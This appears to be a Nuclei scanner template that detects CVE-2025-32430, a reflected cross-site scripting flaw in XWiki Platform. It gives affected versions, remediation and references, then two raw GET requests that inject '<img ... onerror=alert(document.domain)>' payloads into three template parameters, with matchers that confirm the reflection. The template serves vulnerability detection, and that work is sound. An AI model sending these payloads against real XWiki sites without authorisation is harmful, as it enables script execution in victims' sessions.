id: CVE-2025-32430

info:
  name: XWiki Platform - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform versions >= 4.2-milestone-3 and < 16.4.8, >= 16.5.0-rc-1 and < 16.10.6, and >= 17.0.0-rc-1 and < 17.3.0-rc-1 are vulnerable to reflected XSS in two templates. The vulnerability allows an attacker to execute malicious JavaScript code in the context of the victim's session by getting the victim to visit an attacker-controlled URL.
  impact: |
    Attackers can execute malicious JavaScript in victim sessions by crafting URLs with XSS payloads in translationPrefix, extensionId, or extensionVersionConstraint parameters.
  remediation: |
    Upgrade to XWiki Platform version 16.4.8, 16.10.6, or 17.3.0-rc-1 or later that properly sanitizes user input in templates.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m9x4-w7p9-mxhx
    - https://jira.xwiki.org/browse/XWIKI-23096
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32430
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
    cvss-score: 6.5
    cve-id: CVE-2025-32430
    epss-score: 0.00068
    epss-percentile: 0.21012
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,xss,vuln

http:
  - raw:
      - |
        GET /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&extensionVersionConstraint=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=1 onerror=alert(document.domain)>.notFound'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 404
# digest: 4b0a004830460221009e26c84b87f47ec792f3ead1e07a0492882fd5fb260956bab22d3111a2a890d8022100f2722df61d778635382e516c83ff9897c58851780d054391c410a0b0a0cb1f9c:922c64590222798bb761d5b6d8e72950